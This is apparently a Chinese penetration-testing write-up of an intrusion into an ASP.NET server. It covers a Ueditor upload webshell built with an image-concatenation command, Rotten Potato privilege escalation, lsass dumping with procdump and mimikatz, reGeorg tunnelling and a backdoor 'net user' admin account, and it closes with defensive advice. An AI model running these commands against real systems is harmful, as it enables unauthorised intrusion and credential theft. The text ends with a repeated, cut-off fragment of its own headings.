内网渗透实战：绕过防护获取服务器权限<\/h1>

1. 信息收集阶段<\/h2>

1.1 基础信息收集<\/h3>

IP探测<\/strong>：使用超级ping工具获取网站真实IP<\/li>
端口扫描<\/strong>：利用FOFA Pro View插件快速扫描开放端口<\/li>
技术栈识别<\/strong>：使用Wappalyzer插件识别网站中间件和框架（本例中识别为ASP.NET）<\/li> <\/ul>
1.2 目录扫描<\/h3>

使用目录扫描工具发现后台管理页面<\/li>
尝试弱口令登录，发现系统会校验用户名但不限制尝试次数<\/li>
使用Burp Suite配合大字典进行爆破攻击（本例中未成功）<\/li> <\/ul>
1.3 漏洞扫描<\/h3>

使用xray高级版进行自动化扫描（基础爬虫+扫描）<\/li>
手动测试目录遍历漏洞：

找到网站中的图片<\/li>
右键复制图片地址<\/li>
分析相关路径结构<\/li>
尝试访问上级目录<\/li> <\/ul> <\/li> <\/ul>
2. 漏洞利用阶段<\/h2>
2.1 Ueditor漏洞利用<\/h3>

发现Ueditor组件（ASP.NET版本）<\/li>
参考漏洞文章：Ueditor .NET漏洞分析<\/a><\/li>
构造HTML上传界面<\/li>
制作图片马：
copy 1.jpg\/b + 1.aspx\/a 2.jpg <\/code><\/pre> <\/li>
上传图片马并使用截断技巧：
http:\/\/myweb.com\/1.jpg?.aspx <\/code><\/pre> <\/li>成功获取Webshell（使用中国菜刀连接）<\/li> <\/ul> 3. 权限提升阶段<\/h2> 3.1 初始权限分析<\/h3> 执行ipconfig<\/code>发现处于内网环境<\/li> 执行systeminfo<\/code>发现系统为Windows Server 2012，已安装8个补丁<\/li> 使用在线EXP对比工具：Hacking8提权辅助<\/a><\/li> <\/ul> 3.2 提权尝试<\/h3> 烂土豆提权<\/strong>：<\/p> 初始上传失败，发现所有目录不可写<\/li> 写入ASPX查询脚本，查找可读写目录<\/li> 上传预编译出错的shell绕过限制<\/li> 最终成功上传烂土豆EXP并提权至SYSTEM权限<\/li> <\/ul> <\/li> 杀软绕过<\/strong>：<\/p> 发现火绒杀毒软件运行<\/li> 尝试结束杀毒进程（未成功）<\/li> 尝试使用mimikatz读取密码：使用procdump导出lsass.dmp： procdump64.exe -accepteula -ma lsass.exe lsass.dmp <\/code><\/pre> <\/li> 使用mimikatz分析： mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit <\/code><\/pre> <\/li> <\/ul> <\/li> 最终通过其他方法绕过防护，成功添加管理员账户<\/li> <\/ul> <\/li> <\/ol> 4. 内网穿透与远程访问<\/h2> 4.1 端口发现<\/h3> 使用netstat -ano<\/code>发现33890端口（类似RDP的3389）<\/li> 使用tasklist -svc<\/code>查看系统进程，确认端口对应服务<\/li> <\/ul> 4.2 内网穿透<\/h3> 使用Proxifier + reGeorg组合进行内网穿透<\/li> 参考文档：reGeorg使用指南<\/a><\/li> <\/ul> 4.3 远程桌面访问<\/h3> 成功添加管理员账户： net user abc abc \/add net localgroup administrators abc \/add <\/code><\/pre> <\/li> 通过内网穿透访问远程桌面<\/li> <\/ul> 5. 工具与资源总结<\/h2> 信息收集工具<\/strong>：<\/p> FOFA Pro View（端口扫描）<\/li> Wappalyzer（技术栈识别）<\/li> xray（自动化漏洞扫描）<\/li> <\/ul> <\/li> 漏洞利用工具<\/strong>：<\/p> Ueditor漏洞利用POC<\/li> 中国菜刀（Webshell管理）<\/li> 烂土豆提权工具<\/li> <\/ul> <\/li> 权限维持工具<\/strong>：<\/p> mimikatz（凭证提取）<\/li> procdump（内存dump）<\/li> <\/ul> <\/li> 内网穿透工具<\/strong>：<\/p> Proxifier<\/li> reGeorg<\/li> <\/ul> <\/li> 实用资源<\/strong>：<\/p> Hacking8提权辅助平台<\/li> Freebuf安全文章<\/li> <\/ul> <\/li> <\/ol> 6. 经验总结<\/h2> 信息收集至关重要<\/strong>：浏览器插件可以极大提高效率<\/li> 问题解决思路<\/strong>：遇到问题先自行研究，加深理解和记忆<\/li> 工具收集<\/strong>：平时积累各种实用工具和资源<\/li> 经验总结<\/strong>：记录每次渗透的收获和教训，形成自己的方法论<\/li> <\/ol> 7. 防御建议<\/h2> Ueditor防护<\/strong>：<\/p> 及时更新Ueditor组件<\/li> 限制上传文件类型<\/li> 禁用危险的上传功能<\/li> <\/ul> <\/li> 权限控制<\/strong>：<\/p> 遵循最小权限原则<\/li> 定期审计账户权限<\/li> <\/ul> <\/li> 杀毒防护<\/strong>：<\/p> 保持杀毒软件更新<\/li> 配置适当的防护规则<\/li> <\/ul> <\/li> 日志监控<\/strong>：<\/p> 监控异常登录行为<\/li> 分析可疑的进程创建<\/li> <\/ul> <\/li> 内网隔离<\/strong>：<\/p> 实施网络分段<\/li> 限制内网服务的暴露范围<\/li> <\/ul> <\/li> <\/ol>

内网渗透实战：绕过防护获取服务器权限<\/h1>

1. 信息收集阶段<\/h2>

2. 漏洞利用阶段<\/h2>

3. 权限提升阶段<\/h2>

3.1 初始权限分析<\/h3> 执行ipconfig<\/code>发现处于内网环境<\/li> 执行systeminfo<\/code>发现系统为Windows Server 2012，已安装8个补丁<\/li>

3.2 提权尝试<\/h3> 烂土豆提权<\/strong>：<\/p>

4. 内网穿透与远程访问<\/h2>